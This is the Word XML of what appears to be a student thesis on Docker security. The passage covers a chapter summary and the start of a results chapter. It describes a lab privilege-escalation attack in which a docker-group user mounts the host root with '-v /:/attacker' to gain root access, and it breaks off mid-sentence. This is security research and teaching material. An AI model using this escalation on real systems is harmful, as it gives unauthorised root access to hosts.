                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E6CA9" w14:textId="7B7F4DA9" w:rsidR="00925D80" w:rsidRDefault="00925D80" w:rsidP="00346D57">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc86858648"/>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Attacker </w:t>
      </w:r>
      <w:r w:rsidR="00352432" w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lists the files on the target container</w:t>
      </w:r>
      <w:r w:rsidR="00B227E9" w:rsidRPr="00346D57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="387878CE" w14:textId="61DF921F" w:rsidR="00C03AB3" w:rsidRDefault="00C03AB3" w:rsidP="00C03AB3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc86859300"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="58F594DD" w14:textId="37060321" w:rsidR="00F748AF" w:rsidRDefault="00DC3359" w:rsidP="00F748AF">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="00E02394">
        <w:t>illust</w:t>
      </w:r>
      <w:r w:rsidR="003A10C5">
        <w:t>rated the security stance of Docker</w:t>
      </w:r>
      <w:r w:rsidR="002A4751">
        <w:t xml:space="preserve"> using three different attacks.</w:t>
      </w:r>
      <w:r w:rsidR="003203B5">
        <w:t xml:space="preserve"> The procedures and </w:t>
      </w:r>
      <w:r w:rsidR="001C78BD">
        <w:t>approaches used for each attack w</w:t>
      </w:r>
      <w:r w:rsidR="00280B7A">
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidR="001C78BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA0A7C">
        <w:t xml:space="preserve">documented </w:t>
      </w:r>
      <w:r w:rsidR="007C2BFB">
        <w:t>with screenshots</w:t>
      </w:r>
      <w:r w:rsidR="00AC66DC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00072ED6">
        <w:t xml:space="preserve"> Th</w:t>
      </w:r>
      <w:r w:rsidR="00E11929">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="009F1A71">
        <w:t xml:space="preserve"> au</w:t>
      </w:r>
      <w:r w:rsidR="004C4F74">
        <w:t xml:space="preserve">thor has faced </w:t>
      </w:r>
      <w:r w:rsidR="00D84BD9">
        <w:t xml:space="preserve">several challenges </w:t>
      </w:r>
      <w:r w:rsidR="00382561">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00D84BD9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidR="007D440E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E1147">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t xml:space="preserve">experimenting </w:t>
      </w:r>
      <w:r w:rsidR="004E1147">
        <w:t>for each attack</w:t>
      </w:r>
      <w:r w:rsidR="003F0E10">
        <w:t xml:space="preserve">, as this chapter requires </w:t>
      </w:r>
      <w:r w:rsidR="00E46D99">
        <w:t xml:space="preserve">more </w:t>
      </w:r>
      <w:r w:rsidR="00B26B87">
        <w:t>knowledge and skills on Docker architecture</w:t>
      </w:r>
      <w:r w:rsidR="00D9449B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DE4DC2">
        <w:t>Linux commands.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3051">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE7E8D">
        <w:t>However, the attacks were completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217C8F6" w14:textId="7881B114" w:rsidR="00280B7A" w:rsidRPr="00F748AF" w:rsidRDefault="00280B7A" w:rsidP="00F748AF">
      <w:r>
        <w:t xml:space="preserve">The next chapter will </w:t>
      </w:r>
      <w:r w:rsidR="00E775CE">
        <w:t xml:space="preserve">discuss in detail the results </w:t>
      </w:r>
      <w:r w:rsidR="00F603CB">
        <w:t xml:space="preserve">obtained </w:t>
      </w:r>
      <w:r w:rsidR="00532771">
        <w:t>from the experim</w:t>
      </w:r>
      <w:r w:rsidR="00C663FF">
        <w:t>entation of each attack</w:t>
      </w:r>
      <w:r w:rsidR="00F603CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6C226" w14:textId="77777777" w:rsidR="00C03AB3" w:rsidRPr="00C03AB3" w:rsidRDefault="00C03AB3" w:rsidP="00C03AB3"/>
    <w:p w14:paraId="26F0CBCE" w14:textId="77777777" w:rsidR="00925D80" w:rsidRDefault="00925D80" w:rsidP="00113B36"/>
    <w:p w14:paraId="7D8A0453" w14:textId="77777777" w:rsidR="00925D80" w:rsidRPr="00113B36" w:rsidRDefault="00925D80" w:rsidP="00113B36"/>
    <w:p w14:paraId="41E4CE96" w14:textId="20FE956E" w:rsidR="00563288" w:rsidRDefault="00563288" w:rsidP="00DC0ABB"/>
    <w:p w14:paraId="2F8428E8" w14:textId="7DF52DA3" w:rsidR="002B02B6" w:rsidRPr="00DC0ABB" w:rsidRDefault="00563288" w:rsidP="00DC0ABB">
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC6EA9" w14:textId="77777777" w:rsidR="007D6CE5" w:rsidRPr="007D6CE5" w:rsidRDefault="007D6CE5" w:rsidP="007D6CE5"/>
    <w:p w14:paraId="0FC7FEF9" w14:textId="77777777" w:rsidR="00477923" w:rsidRPr="008A0C5A" w:rsidRDefault="00477923" w:rsidP="00567768">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01534FB5" w14:textId="297EA5A7" w:rsidR="00C731FE" w:rsidRPr="00C731FE" w:rsidRDefault="00C731FE" w:rsidP="00C731FE"/>
    <w:p w14:paraId="0133D1DE" w14:textId="77777777" w:rsidR="001000EB" w:rsidRDefault="001000EB" w:rsidP="00D97597"/>
    <w:p w14:paraId="7F3CEF71" w14:textId="77777777" w:rsidR="00EF18DD" w:rsidRPr="00D97597" w:rsidRDefault="00EF18DD" w:rsidP="00D97597"/>
    <w:p w14:paraId="5656E8ED" w14:textId="77777777" w:rsidR="0098184A" w:rsidRPr="0098184A" w:rsidRDefault="0098184A" w:rsidP="0098184A"/>
    <w:p w14:paraId="017F6EBE" w14:textId="77777777" w:rsidR="009E40F6" w:rsidRPr="009E40F6" w:rsidRDefault="009E40F6" w:rsidP="009E40F6"/>
    <w:p w14:paraId="1C9DED46" w14:textId="3560DF0B" w:rsidR="00550694" w:rsidRPr="00550694" w:rsidRDefault="00550694" w:rsidP="00550694"/>
    <w:p w14:paraId="3A945964" w14:textId="77777777" w:rsidR="009C0AC6" w:rsidRPr="009C0AC6" w:rsidRDefault="009C0AC6" w:rsidP="009C0AC6"/>
    <w:p w14:paraId="387320E9" w14:textId="77777777" w:rsidR="00072AF0" w:rsidRPr="00072AF0" w:rsidRDefault="00072AF0" w:rsidP="00072AF0"/>
    <w:p w14:paraId="0ACF50EF" w14:textId="77777777" w:rsidR="00C322CB" w:rsidRPr="00C322CB" w:rsidRDefault="00C322CB" w:rsidP="00C322CB"/>
    <w:p w14:paraId="408744C3" w14:textId="77777777" w:rsidR="00C03AB3" w:rsidRDefault="00C03AB3" w:rsidP="0070485A"/>
    <w:p w14:paraId="33AA183E" w14:textId="0208C6D1" w:rsidR="0070485A" w:rsidRDefault="002114C7" w:rsidP="0070485A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc86859301"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t>RESULTS</w:t>
      </w:r>
      <w:r w:rsidR="0070485A">
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t>DISCUSSIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w14:paraId="7F85AABC" w14:textId="5D148201" w:rsidR="00C663FF" w:rsidRDefault="0049245D" w:rsidP="0049245D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc86859302"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w14:paraId="76CC3926" w14:textId="414789F2" w:rsidR="006344FA" w:rsidRDefault="00EC6C39" w:rsidP="006344FA">
      <w:r>
        <w:t xml:space="preserve">This chapter will discuss and analyse the results obtained </w:t>
      </w:r>
      <w:r w:rsidR="005F326B">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00AD7B33">
        <w:t xml:space="preserve"> running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00A23F11">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of each attack.</w:t>
      </w:r>
      <w:r w:rsidR="00531B58">
        <w:t xml:space="preserve"> The author will compare </w:t>
      </w:r>
      <w:r w:rsidR="0044447B">
        <w:t xml:space="preserve">and justify </w:t>
      </w:r>
      <w:r w:rsidR="00531B58">
        <w:t xml:space="preserve">the results </w:t>
      </w:r>
      <w:r w:rsidR="000F41AC">
        <w:t xml:space="preserve">with the </w:t>
      </w:r>
      <w:r w:rsidR="00B2245A">
        <w:t>literature review</w:t>
      </w:r>
      <w:r w:rsidR="00B70029">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F65FE">
        <w:t xml:space="preserve">to decide whether </w:t>
      </w:r>
      <w:r w:rsidR="008E5380">
        <w:t>the attacks were successful or not.</w:t>
      </w:r>
      <w:r w:rsidR="001922FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA7A61">
        <w:t xml:space="preserve">Further, </w:t>
      </w:r>
      <w:r w:rsidR="008B0D77">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00DA7A61">
        <w:t xml:space="preserve">will provide </w:t>
      </w:r>
      <w:r w:rsidR="008B0D77">
        <w:t>various mitigation methods for each attack. Moreover</w:t>
      </w:r>
      <w:r w:rsidR="001922FA">
        <w:t xml:space="preserve">, this </w:t>
      </w:r>
      <w:r w:rsidR="00CE08EF">
        <w:t xml:space="preserve">chapter will </w:t>
      </w:r>
      <w:r w:rsidR="009F3533">
        <w:t>evaluate the outcome</w:t>
      </w:r>
      <w:r w:rsidR="00805222">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00533CF5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00570F7D">
        <w:t xml:space="preserve"> determin</w:t>
      </w:r>
      <w:r w:rsidR="00533CF5">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00570F7D">
        <w:t xml:space="preserve"> whether the aims and objectives</w:t>
      </w:r>
      <w:r w:rsidR="009F3533">
        <w:t xml:space="preserve"> of this project </w:t>
      </w:r>
      <w:r w:rsidR="00570F7D">
        <w:t>ha</w:t>
      </w:r>
      <w:r w:rsidR="00CF36C8">
        <w:t>ve been achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFBBD8" w14:textId="11297D78" w:rsidR="000562D3" w:rsidRDefault="00D84EA5" w:rsidP="00646269">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc86859303"/>
      <w:r>
        <w:t>RESULTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="4C578677" w14:textId="363C95DC" w:rsidR="00961762" w:rsidRDefault="00912D0E" w:rsidP="00961762">
      <w:r>
        <w:t xml:space="preserve">This section </w:t>
      </w:r>
      <w:r w:rsidR="00E12721">
        <w:t xml:space="preserve">presents </w:t>
      </w:r>
      <w:r w:rsidR="0089129F">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D84EA5">
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidR="0089129F">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00D84EA5">
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:r w:rsidR="0089129F">
        <w:t xml:space="preserve">attack </w:t>
      </w:r>
      <w:r w:rsidR="0092321E">
        <w:t>demonstrated in the previous chapter.</w:t>
      </w:r>
      <w:r w:rsidR="005C23E3">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00D84EA5">
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidR="005C23E3">
        <w:t xml:space="preserve"> are divided into three </w:t>
      </w:r>
      <w:r w:rsidR="004C7D2C">
        <w:t>sections</w:t>
      </w:r>
      <w:r w:rsidR="005E24D8">
        <w:t xml:space="preserve"> representing each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E2951" w14:textId="148D2F16" w:rsidR="003967E1" w:rsidRDefault="003967E1" w:rsidP="00961762">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Privilege es</w:t>
      </w:r>
      <w:r w:rsidR="001D2EA1" w:rsidRPr="00CA2A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>calation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07541DB6" w14:textId="255A16BE" w:rsidR="00CA2A54" w:rsidRDefault="00AC3D60" w:rsidP="00961762">
      <w:r>
        <w:t>In this attack</w:t>
      </w:r>
      <w:r w:rsidR="00587E1C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D819EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A2182">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00FB4227">
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidR="009A2182">
        <w:t xml:space="preserve"> user was </w:t>
      </w:r>
      <w:r w:rsidR="00C76C93">
        <w:t>able</w:t>
      </w:r>
      <w:r w:rsidR="000D0921">
        <w:t xml:space="preserve"> to escape</w:t>
      </w:r>
      <w:r w:rsidR="00C76C93">
        <w:t xml:space="preserve"> his/her privilege</w:t>
      </w:r>
      <w:r w:rsidR="000D0921">
        <w:t xml:space="preserve"> to root user</w:t>
      </w:r>
      <w:r w:rsidR="0010596F">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00F25FCB">
        <w:t>taking advantage of</w:t>
      </w:r>
      <w:r w:rsidR="00BB7FF3">
        <w:t xml:space="preserve"> becoming</w:t>
      </w:r>
      <w:r w:rsidR="00F25FCB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00647AF9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00F25FCB">
        <w:t>Docker group.</w:t>
      </w:r>
      <w:r w:rsidR="0010596F">
        <w:t xml:space="preserve"> Initially, the user </w:t>
      </w:r>
      <w:r w:rsidR="006D3B16">
        <w:t xml:space="preserve">has no privilege to run root or sudoers command, as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="004E21A5">
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidR="009754D6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005F769D">
        <w:t xml:space="preserve"> However, the user was </w:t>
      </w:r>
      <w:r w:rsidR="00293E69">
        <w:t xml:space="preserve">added to the Docker group </w:t>
      </w:r>
      <w:r w:rsidR="00E63A11">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="0068488F">
        <w:t xml:space="preserve"> run any Docker commands on the host. As </w:t>
      </w:r>
      <w:r w:rsidR="000D4D34">
        <w:t xml:space="preserve">a result, the </w:t>
      </w:r>
      <w:r w:rsidR="0075568E">
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="000D4D34">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D82D20">
        <w:t>created a Dockerfile</w:t>
      </w:r>
      <w:r w:rsidR="00F0319D">
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="00D82D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C14B6">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="001514D9">
        <w:t>allows him</w:t>
      </w:r>
      <w:r w:rsidR="00FA603A">
        <w:t xml:space="preserve"> to mount </w:t>
      </w:r>
      <w:r w:rsidR="00292F8F">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00EF288A">
        <w:t>entire working directory</w:t>
      </w:r>
      <w:r w:rsidR="006A38BB">
        <w:t xml:space="preserve"> of the host</w:t>
      </w:r>
      <w:r w:rsidR="000A3FAB">
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidR="00B1176B">
        <w:t>running instance container</w:t>
      </w:r>
      <w:r w:rsidR="0071180E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE668E7" w14:textId="3C48B180" w:rsidR="009317D1" w:rsidRDefault="009317D1" w:rsidP="004E5A1D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D309D1" wp14:editId="675B5A89">
            <wp:extent cx="3175000" cy="748030"/>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75000" cy="748030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5492D" w14:textId="56CEA5B9" w:rsidR="000C4772" w:rsidRDefault="004F5DD5" w:rsidP="00632BAF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc86858649"/>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C64010">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:Before the attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="278ED5C7" w14:textId="56716FD9" w:rsidR="00A634EE" w:rsidRDefault="007C15F3" w:rsidP="00A634EE">
      <w:r>
        <w:t xml:space="preserve">Therefore, the attacker launched a container </w:t>
      </w:r>
      <w:r w:rsidR="00486826">
        <w:t xml:space="preserve">based on the Docker image </w:t>
      </w:r>
      <w:r w:rsidR="0063454E">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="009E0FC3">
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="002A495C">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="009E0FC3">
        <w:t>interactive shell</w:t>
      </w:r>
      <w:r w:rsidR="007F0823">
        <w:t>, as shown in figure 59.</w:t>
      </w:r>
      <w:r w:rsidR="004674C9">
        <w:t xml:space="preserve"> The command </w:t>
      </w:r>
      <w:r w:rsidR="00DB402E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004674C9">
        <w:t>-v /</w:t>
      </w:r>
      <w:r w:rsidR="00DB402E">
        <w:t xml:space="preserve">:/attacker” </w:t>
      </w:r>
      <w:r w:rsidR="001B2211">
        <w:t xml:space="preserve">paves </w:t>
      </w:r>
      <w:r w:rsidR="002A495C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00497234">
        <w:t>way to the attacker as the root directory “/”</w:t>
      </w:r>
      <w:r w:rsidR="006C5491">
        <w:t xml:space="preserve"> on the host</w:t>
      </w:r>
      <w:r w:rsidR="00497234">
        <w:t xml:space="preserve"> is accessible </w:t>
      </w:r>
      <w:r w:rsidR="000A1A59">
        <w:t>in the</w:t>
      </w:r>
      <w:r w:rsidR="00C75C63">
        <w:t xml:space="preserve"> “/attacker” directory</w:t>
      </w:r>
      <w:r w:rsidR="00D62DE6">
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidR="0024354F">
        <w:t>container.</w:t>
      </w:r>
      <w:r w:rsidR="00B44D0F">
        <w:t xml:space="preserve"> The container also </w:t>
      </w:r>
      <w:r w:rsidR="003445C3">
        <w:t xml:space="preserve">provides the attacker with shell </w:t>
      </w:r>
      <w:r w:rsidR="002F6572">
        <w:t>access to run bash commands inside the container.</w:t>
      </w:r>
      <w:r w:rsidR="00F54ED3">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00B14A33">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00F54ED3">
        <w:t xml:space="preserve">commands in figure 59 </w:t>
      </w:r>
      <w:r w:rsidR="00414038">
        <w:t>granted</w:t>
      </w:r>
      <w:r w:rsidR="003E23C3">
        <w:t xml:space="preserve"> the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E6598A">
        <w:t>with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="008732EC">
        <w:t xml:space="preserve"> inside the container </w:t>
      </w:r>
      <w:r w:rsidR="00F12C2D">
        <w:t>but not in the host machine.</w:t>
      </w:r>
      <w:r w:rsidR="007374C2">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="008F2ECF">
        <w:t xml:space="preserve"> the attacker has acc</w:t>
      </w:r>
      <w:r w:rsidR="00435819">
        <w:t>ess to</w:t>
      </w:r>
      <w:r w:rsidR="008F2ECF">
        <w:t xml:space="preserve"> the entire host </w:t>
      </w:r>
      <w:r w:rsidR="00A44D3B">
        <w:t>root directory</w:t>
      </w:r>
      <w:r w:rsidR="00435819">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="00880123">
        <w:t xml:space="preserve">the root </w:t>
      </w:r>
      <w:r w:rsidR="00291110">
        <w:t xml:space="preserve">volume </w:t>
      </w:r>
      <w:r w:rsidR="00435819">
        <w:t xml:space="preserve">“/” </w:t>
      </w:r>
      <w:r w:rsidR="0004566D">
        <w:t>is mounted</w:t>
      </w:r>
      <w:r w:rsidR="005005AE">
        <w:t xml:space="preserve"> to the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00CE7824">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="005005AE">
        <w:t xml:space="preserve"> working directory.</w:t>
      </w:r>
      <w:r w:rsidR="00071730">
        <w:t xml:space="preserve"> Thus, the </w:t>
      </w:r>
      <w:r w:rsidR="00856A8D">
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r w:rsidR="008D7E52">
        <w:t>escaped one level and added himself to the</w:t>
      </w:r>
      <w:r w:rsidR="003D29E6">
